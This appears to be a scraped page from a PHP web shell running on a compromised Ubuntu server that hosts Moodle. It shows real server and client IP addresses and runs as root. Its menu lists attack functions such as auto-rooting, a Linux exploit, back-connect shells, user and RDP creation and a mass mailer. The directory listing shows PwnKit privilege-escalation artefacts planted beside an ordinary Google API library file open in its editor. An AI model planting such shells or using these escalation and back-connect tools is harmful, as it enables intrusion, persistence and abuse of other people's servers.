Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
google /
src /
Google /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Auth
[ DIR ]
drwxrwxrwx
Cache
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Http
[ DIR ]
drwxrwxrwx
IO
[ DIR ]
drwxrwxrwx
Logger
[ DIR ]
drwxrwxrwx
Service
[ DIR ]
drwxrwxrwx
Signer
[ DIR ]
drwxrwxrwx
Task
[ DIR ]
drwxrwxrwx
Utils
[ DIR ]
drwxrwxrwx
Verifier
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
Client.php
19.89
KB
-rwxrwxrwx
Collection.php
2.53
KB
-rwxrwxrwx
Config.php
13.75
KB
-rwxrwxrwx
Exception.php
647
B
-rwxrwxrwx
Model.php
7.98
KB
-rwxrwxrwx
Service.php
1.26
KB
-rwxrwxrwx
Utils.php
3.85
KB
-rwxrwxrwx
autoload.php
1.04
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Collection.php
<?php if (!class_exists('Google_Client')) { require_once dirname(__FILE__) . '/autoload.php'; } /** * Extension to the regular Google_Model that automatically * exposes the items array for iteration, so you can just * iterate over the object rather than a reference inside. */ class Google_Collection extends Google_Model implements Iterator, Countable { protected $collection_key = 'items'; public function rewind() { if (isset($this->modelData[$this->collection_key]) && is_array($this->modelData[$this->collection_key])) { reset($this->modelData[$this->collection_key]); } } public function current() { $this->coerceType($this->key()); if (is_array($this->modelData[$this->collection_key])) { return current($this->modelData[$this->collection_key]); } } public function key() { if (isset($this->modelData[$this->collection_key]) && is_array($this->modelData[$this->collection_key])) { return key($this->modelData[$this->collection_key]); } } public function next() { return next($this->modelData[$this->collection_key]); } public function valid() { $key = $this->key(); return $key !== null && $key !== false; } public function count() { if (!isset($this->modelData[$this->collection_key])) { return 0; } return count($this->modelData[$this->collection_key]); } public function offsetExists($offset) { if (!is_numeric($offset)) { return parent::offsetExists($offset); } return isset($this->modelData[$this->collection_key][$offset]); } public function offsetGet($offset) { if (!is_numeric($offset)) { return parent::offsetGet($offset); } $this->coerceType($offset); return $this->modelData[$this->collection_key][$offset]; } public function offsetSet($offset, $value) { if (!is_numeric($offset)) { return parent::offsetSet($offset, $value); } $this->modelData[$this->collection_key][$offset] = $value; } public function offsetUnset($offset) { if (!is_numeric($offset)) { return parent::offsetUnset($offset); } unset($this->modelData[$this->collection_key][$offset]); } private function coerceType($offset) { $typeKey = $this->keyType($this->collection_key); if (isset($this->$typeKey) && !is_object($this->modelData[$this->collection_key][$offset])) { $type = $this->$typeKey; $this->modelData[$this->collection_key][$offset] = new $type($this->modelData[$this->collection_key][$offset]); } } }
Close